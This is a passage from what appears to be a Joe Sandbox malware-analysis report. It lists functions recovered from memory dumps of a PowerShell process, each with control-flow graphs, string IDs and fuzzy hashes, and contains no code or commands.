                                                        control_flow_graph 1963 6f83e00-6f83e21 1964 6f83e31 1963->1964 1965 6f83e23-6f83e2f 1963->1965 1966 6f83e33-6f83e35 1964->1966 1965->1966 1967 6f83e3b-6f83e3d 1966->1967 1968 6f83f15-6f83f1f 1966->1968 1969 6f83e4d 1967->1969 1970 6f83e3f-6f83e4b 1967->1970 1971 6f83f2d-6f83f33 1968->1971 1972 6f83f21-6f83f2a 1968->1972 1973 6f83e4f-6f83e51 1969->1973 1970->1973 1974 6f83f39-6f83f45 1971->1974 1975 6f83f35-6f83f37 1971->1975 1973->1968 1976 6f83e57-6f83e59 1973->1976 1977 6f83f47-6f83f63 1974->1977 1975->1977 1978 6f83e5b-6f83e61 1976->1978 1979 6f83e73-6f83e7f 1976->1979 1981 6f83e63 1978->1981 1982 6f83e65-6f83e71 1978->1982 1983 6f83e8d-6f83e92 1979->1983 1984 6f83e81-6f83e83 1979->1984 1981->1979 1982->1979 1986 6f83e94 1983->1986 1987 6f83e97-6f83ea6 1983->1987 1984->1983 1986->1987 1991 6f83ea8-6f83eb3 1987->1991 1992 6f83eb5 1987->1992 1993 6f83f09-6f83f12 1991->1993 1994 6f83eba-6f83efb 1992->1994 1999 6f83efd 1994->1999 2000 6f83f02 1994->2000 1999->2000 2000->1993
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q
                                                        • API String ID: 0-182748909
                                                        • Opcode ID: 2bac85856472dd59b345f1e8383f17678f7a87b856cc191fa5658031eee52883
                                                        • Instruction ID: ffe8b52c9c031c3af11c0aeadb6b2e261d9ecb31a89db34a6a7f5576dccc4c42
                                                        • Opcode Fuzzy Hash: 2bac85856472dd59b345f1e8383f17678f7a87b856cc191fa5658031eee52883
                                                        • Instruction Fuzzy Hash: 53413733F001159FCB58AEAC898066ABBE5AF84A10B1484AAC855D7261DB32DD05C7E1
                                                        Function 06F84420 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2001 6f84420-6f84430 2002 6f84440 2001->2002 2003 6f84432-6f8443e 2001->2003 2004 6f84442-6f84444 2002->2004 2003->2004 2005 6f844d8-6f844e2 2004->2005 2006 6f8444a-6f8444c 2004->2006 2009 6f844ed-6f844f3 2005->2009 2010 6f844e4-6f844ea 2005->2010 2007 6f8445c 2006->2007 2008 6f8444e-6f8445a 2006->2008 2011 6f8445e-6f84460 2007->2011 2008->2011 2012 6f844f9-6f84505 2009->2012 2013 6f844f5-6f844f7 2009->2013 2011->2005 2014 6f84462-6f8447a 2011->2014 2015 6f84507-6f84520 2012->2015 2013->2015 2019 6f8447c-6f84482 2014->2019 2020 6f84494-6f844b3 2014->2020 2022 6f84484 2019->2022 2023 6f84486-6f84492 2019->2023 2025 6f84523-6f84528 2020->2025 2026 6f844b5-6f844bc 2020->2026 2022->2020 2023->2020 2025->2026 2030 6f844c3-6f844d2 2026->2030 2030->2005
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q
                                                        • API String ID: 0-182748909
                                                        • Opcode ID: 15dfaaffde286243a8413d542e1d1d38ffaecbb8ba3669a72f408be339095318
                                                        • Instruction ID: 6a23a7217a7af601efdd0549b24299827a07616d412d2eab0af438fed13c9536
                                                        • Opcode Fuzzy Hash: 15dfaaffde286243a8413d542e1d1d38ffaecbb8ba3669a72f408be339095318
                                                        • Instruction Fuzzy Hash: 1A212932B143165FEBA87D6D8840B37BADABBC0715F24886A9D45CB291DD76C841C3B1
                                                        Function 06E1D96B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2031 6e1d96b-6e1d9ab 2033 6e1d9b3-6e1d9df SetThreadToken 2031->2033 2034 6e1d9e1-6e1d9e7 2033->2034 2035 6e1d9e8-6e1da05 2033->2035 2034->2035
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2698476411.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ThreadToken
                                                        • String ID: Z^L%
                                                        • API String ID: 3254676861-4095665966
                                                        • Opcode ID: 0b7b423a10a48595970eba6d1709f10022428171149e11a7af0c355d577d6913
                                                        • Instruction ID: a98990a352373d7fcedf95f59fe3afc69a95919c92e7369fc6a183a4f95f2e4a
                                                        • Opcode Fuzzy Hash: 0b7b423a10a48595970eba6d1709f10022428171149e11a7af0c355d577d6913
                                                        • Instruction Fuzzy Hash: C61116B59003488FCB10DF9AD945BDEFBF8EF49320F14845AD419A7210C778A944CFA1
                                                        Function 06E1D970 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2038 6e1d970-6e1d9df SetThreadToken 2040 6e1d9e1-6e1d9e7 2038->2040 2041 6e1d9e8-6e1da05 2038->2041 2040->2041
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2698476411.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ThreadToken
                                                        • String ID: Z^L%
                                                        • API String ID: 3254676861-4095665966
                                                        • Opcode ID: e1c9dd34590c5ec72683b694894b04b1ff067dcdd887b9abe70b32d980be5c03
                                                        • Instruction ID: 828537c0a3ee57d60f3b15a5686443b3f590e85d05e7edd0044cdf554543a8d8
                                                        • Opcode Fuzzy Hash: e1c9dd34590c5ec72683b694894b04b1ff067dcdd887b9abe70b32d980be5c03
                                                        • Instruction Fuzzy Hash: 5811F5B59007488FCB10DF9AC985BDEFBF8EF89324F14845AD519A7210C778A944CFA1
                                                        Function 06F872B8 Relevance: 3.0, Strings: 2, Instructions: 544COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$(fsl
                                                        • API String ID: 0-916006527
                                                        • Opcode ID: 84955cac56398bf9344ba54169830f97e0dcb2f5e6ec946dd0e3fb4b535920bd
                                                        • Instruction ID: b4606812bbb5a9706381fc79027a4092b6a41f3426dceca8232391331d60dec3
                                                        • Opcode Fuzzy Hash: 84955cac56398bf9344ba54169830f97e0dcb2f5e6ec946dd0e3fb4b535920bd
                                                        • Instruction Fuzzy Hash: 5C225A70E002049FDB94EB58C595FAEBBB2EF84314F24C0A9E9099B355CB72ED41CB91
                                                        Function 06F8440D Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q
                                                        • API String ID: 0-127220927
                                                        • Opcode ID: 63c1b68536c306a79d1fea1fa4e031b1e15ec5ed119b7d752dbc90fb5a553390
                                                        • Instruction ID: 2b3cecd8a79c7cd6ba30910e37480d57e70351169a4b115845828c2042496552
                                                        • Opcode Fuzzy Hash: 63c1b68536c306a79d1fea1fa4e031b1e15ec5ed119b7d752dbc90fb5a553390
                                                        • Instruction Fuzzy Hash: 01113872F143266FEBB42D298940B737BD9ABC0A11F2484A6AD5487292D9768440C3B1
                                                        Function 06F83DFF Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q
                                                        • API String ID: 0-127220927
                                                        • Opcode ID: 8e9bc111b8d9ced6121eac667d20121d80865aa4c8bbfd25c8150e1b5cee49d4
                                                        • Instruction ID: 48568249031c6f84eb7ead1a6a3a6e1ce31d278628672065e09619ca5a53862f
                                                        • Opcode Fuzzy Hash: 8e9bc111b8d9ced6121eac667d20121d80865aa4c8bbfd25c8150e1b5cee49d4
                                                        • Instruction Fuzzy Hash: E511D337E00619DFCFA4AE9D898056AB7F4BF48E10B2585AADC48A7214E730DD04C7E1
                                                        Function 06F882C0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x.dk
                                                        • API String ID: 0-1726819062
                                                        • Opcode ID: bfe40918eb1e94bb5d41ef918d237b315be7b7d37f78c50bd5ba10d60fa9067d
                                                        • Instruction ID: a43c8f18af26bcd0796ff999262b21db59fa902b7b27d55b0c1337ff9f34a08f
                                                        • Opcode Fuzzy Hash: bfe40918eb1e94bb5d41ef918d237b315be7b7d37f78c50bd5ba10d60fa9067d
                                                        • Instruction Fuzzy Hash: B931E1B0B402109FD344AB68CA51BEE7AA7EFC5740F14C464EA056F396CF769C06CBA1
                                                        Function 06F84548 Relevance: .4, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a462d1e00b48344effcdad95f572e4bc71b5883e142557a6e6350713fae8ec20
                                                        • Instruction ID: 74639b00867d4adbfdd560ac3fa55b8b53488ccb0a90cf4a21e75a20ecd28016
                                                        • Opcode Fuzzy Hash: a462d1e00b48344effcdad95f572e4bc71b5883e142557a6e6350713fae8ec20
                                                        • Instruction Fuzzy Hash: 35E15A70F012059FDB94EF58C581AAABBE2EF84704F14C0A9E9099F355CB72ED46CB91
                                                        Function 06F872B7 Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 988aa7ac933fac9a0dd0cf3ffa96fc532884ab05701e34ed0d86991533ba53d0
                                                        • Instruction ID: 02c69f22c926b0ef236859357f61fbf1b808f5594e8a5d4e3d0d7d3daf13ff88
                                                        • Opcode Fuzzy Hash: 988aa7ac933fac9a0dd0cf3ffa96fc532884ab05701e34ed0d86991533ba53d0
                                                        • Instruction Fuzzy Hash: C7F14A74E012049FDB94EB58C591FADBBB2EF88714F24C099E9099B391CB72ED41CB91
                                                        Function 06F8452C Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81ef43ed2437f3f829ff5c68b4707f94fa5ec2d79c92660908c946a966a28066
                                                        • Instruction ID: 3227c82cbc5c277c8c426c7be74b1a4c649b55cad415bcee15370fade4c053ac
                                                        • Opcode Fuzzy Hash: 81ef43ed2437f3f829ff5c68b4707f94fa5ec2d79c92660908c946a966a28066
                                                        • Instruction Fuzzy Hash: 22E14A74E012059FDB94DF58C581AAABBF2EF88714F14C0A9E909AB351C772ED46CB90
                                                        Function 040A72A8 Relevance: .3, Instructions: 313COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd583b5a3266956e6d7947bb65651d9363f90d2be7547de5c1f5a75f064aae74
                                                        • Instruction ID: 8d24ea7da85810e5c160bf145112571f12d488ae18c2dc001461942ccfd137e0
                                                        • Opcode Fuzzy Hash: bd583b5a3266956e6d7947bb65651d9363f90d2be7547de5c1f5a75f064aae74
                                                        • Instruction Fuzzy Hash: D6C19C36A002089FDB14DFE4D944AAEBBF2FF85304F158569E406AB365DB74ED49CB80
                                                        Function 040A2AA0 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10307f5b64d67a672a81f1d9d3da998c84ba1ce6ff6c5bc017aaf6cad0fe9c39
                                                        • Instruction ID: 5f8ab056fade3098fe7c0d8da5db41c74f3d3825bb01df9327268bbcae46dcdd
                                                        • Opcode Fuzzy Hash: 10307f5b64d67a672a81f1d9d3da998c84ba1ce6ff6c5bc017aaf6cad0fe9c39
                                                        • Instruction Fuzzy Hash: D0918D74A002099FCB05CF98C5D49AEFBB1FF89310B2585AAD855AB3A5C735FC51CBA0
                                                        Function 040A7A70 Relevance: .2, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b436e5a9a9faaa35cf66284116ccad5ae8905088b18ab8d48b4a9e5292cecc24
                                                        • Instruction ID: a03b23d45c241ef7b8f3ff34c369dd275b52a024d02b309877c8c5d2f29a56b5
                                                        • Opcode Fuzzy Hash: b436e5a9a9faaa35cf66284116ccad5ae8905088b18ab8d48b4a9e5292cecc24
                                                        • Instruction Fuzzy Hash: F6718F71A002098FCB14DFA8D880A9DBBF6FF89314F14C56AD405EB661DB75EC46CB91
                                                        Function 040A7BDE Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54f2942d1bc3b01e29e51dd39d17c1bfc7ef1e02aa35ffd5e69d6e2367f49a9e
                                                        • Instruction ID: 836c6f10fded63d5d96948247033e3c3d219d0a2622c2f7d478ae085ba249995
                                                        • Opcode Fuzzy Hash: 54f2942d1bc3b01e29e51dd39d17c1bfc7ef1e02aa35ffd5e69d6e2367f49a9e
                                                        • Instruction Fuzzy Hash: 4D713B71A002099FDB14DFB4D884BADBBF2FF88304F148429D416AB361DB75AD46CB51
                                                        Function 040AFB71 Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c58aa0d4127fa587e9942dd7145381a37724c0088475f86d9e8f10144d59112
                                                        • Instruction ID: 898fe8c4ab9d6d08b6a3c703530bd30defd3f747cc2ffee09662c4f2f2db8572
                                                        • Opcode Fuzzy Hash: 5c58aa0d4127fa587e9942dd7145381a37724c0088475f86d9e8f10144d59112
                                                        • Instruction Fuzzy Hash: D04184356002059FDB05DF79C454BAEBBF7AF89310F18C469E805EB396CA359C46CBA1
                                                        Function 040A7801 Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9d1fa38d8da67d65c1e3680abb7fc251686b83454c0a03780d9a9e838520770
                                                        • Instruction ID: 3122b378049f3441e6f8e35506d6abc44a9e098c64bee4ee70a4b6071efd4e2c
                                                        • Opcode Fuzzy Hash: e9d1fa38d8da67d65c1e3680abb7fc251686b83454c0a03780d9a9e838520770
                                                        • Instruction Fuzzy Hash: AE415735B002149FDB15DB74D858ABA7BF6BF88350F088468E406EB3A1DB34AD41CB90
                                                        Function 040AFBA0 Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92e10d557cbb0782a54bf4e02a637ef50db8b7ef90d357ddc82d3325e1083059
                                                        • Instruction ID: a3ab379e44efa5b4eac96f50b3e49d0edde87c634bd7d0878ab2bab1b5576500
                                                        • Opcode Fuzzy Hash: 92e10d557cbb0782a54bf4e02a637ef50db8b7ef90d357ddc82d3325e1083059
                                                        • Instruction Fuzzy Hash: 614132346002089FDB08DF79D595BAEBAF7FF88310F14C469D805AB355CA35DC468BA1
                                                        Function 040A7A5B Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdeba140261985c98ffc796b095aed84a1c16a402cd0abf824c19e87b2a52a30
                                                        • Instruction ID: 5cef2bc303440929c90abb1842e3c01777240160de78a306cddf2f400e73c3d6
                                                        • Opcode Fuzzy Hash: bdeba140261985c98ffc796b095aed84a1c16a402cd0abf824c19e87b2a52a30
                                                        • Instruction Fuzzy Hash: 62416D71A006189FDB18DFB9D884BAEBBF2BF88300F14842DD005AB765DB75A946CB51
                                                        Function 040A2BB0 Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31521b3541b46cd9df9f22e9cf3729c86045f3a0d0de11f357a6f2fa07b515a4
                                                        • Instruction ID: 192ee2297653bbf0636176a167eb4b27243c8658434643ce7529afd3d5c98172
                                                        • Opcode Fuzzy Hash: 31521b3541b46cd9df9f22e9cf3729c86045f3a0d0de11f357a6f2fa07b515a4
                                                        • Instruction Fuzzy Hash: 86414874A005098FCB05CF98C594AAEFBB1FF49310F1585A9D806AB365C732FDA0CBA0
                                                        Function 06F8214C Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07186c98435e5cec89d0c8bc8c9c4558ffd65fb96b7206ecce1ae039ea1033ec
                                                        • Instruction ID: 8b34acb0c30bbf04c064570b164ab968e74c8120866ceaaabfbbe69fd7eeb335
                                                        • Opcode Fuzzy Hash: 07186c98435e5cec89d0c8bc8c9c4558ffd65fb96b7206ecce1ae039ea1033ec
                                                        • Instruction Fuzzy Hash: B6313A72F051208FD79166785E216AEB7A6DFD4355F1484EACA019F252CE37AE01C3F2
                                                        Function 06F88794 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21c6e1539c7d5467e18212b8f48e9bbaf12a70711088139cdd080439725adbb3
                                                        • Instruction ID: 5cef29913235dbb605926dc534152acdc938ff9ac7a0f06ded35caf1045a0131
                                                        • Opcode Fuzzy Hash: 21c6e1539c7d5467e18212b8f48e9bbaf12a70711088139cdd080439725adbb3
                                                        • Instruction Fuzzy Hash: F1318E37F082118FDB556A2489513BABFA2DFC1251F8484F6C512CB291DF3AD845C7A1
                                                        Function 008CF51B Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688486556.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_8cd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                        • Instruction ID: 904af2783c436c08d18f87c0e9340300e1b5171b84bbfb8fb8ce1422692bbfb6
                                                        • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                        • Instruction Fuzzy Hash: BE216D76504240DFDB06CF14D5C4B15BF72FB58314F24C6ADDA094A656C33AD85ACB91
                                                        Function 008CD01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688486556.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_8cd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 172119f3311469629e88aa8321ede3c5b2ab1d36030068f428358f26cc5a25dd
                                                        • Instruction ID: cb98198f74d6e3174f19be75fa3e513f80b94695c3a19663e7bf8bdef42e3763
                                                        • Opcode Fuzzy Hash: 172119f3311469629e88aa8321ede3c5b2ab1d36030068f428358f26cc5a25dd
                                                        • Instruction Fuzzy Hash: 5001A7714057449AD7209A1DCD84F67BFE8FF56324F18C47DED488A246C279D842C6B1
                                                        Function 008CD01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688486556.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_8cd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de7be0449682561256074b3c268745b157841b946b0a20685943b4c97f2e9f17
                                                        • Instruction ID: 609fa01ce9d76352b3a33a2f85114a7ac964be1326bd1aacf8f5dd430a904566
                                                        • Opcode Fuzzy Hash: de7be0449682561256074b3c268745b157841b946b0a20685943b4c97f2e9f17
                                                        • Instruction Fuzzy Hash: B5F0C272004344AEE7208A1ACD84B63FFE8EF52734F18C46AED484E286C2799C40CAB0
                                                        Function 06F84B85 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f4432ed4280142090536c0602315e22032187b4b0a268c57c181dfe0a667f80
                                                        • Instruction ID: 181d888184f7f4077f20c942fd9c137108a83c978e466be23cade7be9f48d784
                                                        • Opcode Fuzzy Hash: 6f4432ed4280142090536c0602315e22032187b4b0a268c57c181dfe0a667f80
                                                        • Instruction Fuzzy Hash: C6F06535A093859FD795DF10CC90E15BBB1AF82211B19C1DAE0548F1A3C735CC46C751
                                                        Function 040AFD45 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4dc20d06d58cc6e6f9f3a8c0d096e733b4b124f325077841b96b0ae826ed12d9
                                                        • Instruction ID: 82bebc9767b3e76b948e413964ef9c3a63093bd174d12f0dc0f3e786befc1529
                                                        • Opcode Fuzzy Hash: 4dc20d06d58cc6e6f9f3a8c0d096e733b4b124f325077841b96b0ae826ed12d9
                                                        • Instruction Fuzzy Hash: CCE0DF30D492865FC712CFA8C880498FFB1AF16220B04C4EED849EB213E6328912CB91
                                                        Function 040AFD57 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d0b70811e07ae1474915469ef60b2622c907d2c57771aac1e4f6e469b9e67d9
                                                        • Instruction ID: 05d23869b3bb5dd395584acd51dfcbe970abba75628ef950a4638b0dd5de4947
                                                        • Opcode Fuzzy Hash: 5d0b70811e07ae1474915469ef60b2622c907d2c57771aac1e4f6e469b9e67d9
                                                        • Instruction Fuzzy Hash: 16E04C74D052099F8780DFB9994156EFBF4AB48204B5085AA9919E7201E73156528BD1
                                                        Function 040AFD58 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                        • Instruction ID: 28ce5ca6f3554188ff8f23c91cf3aadbde5650814e8c56212e4f2423e10d8578
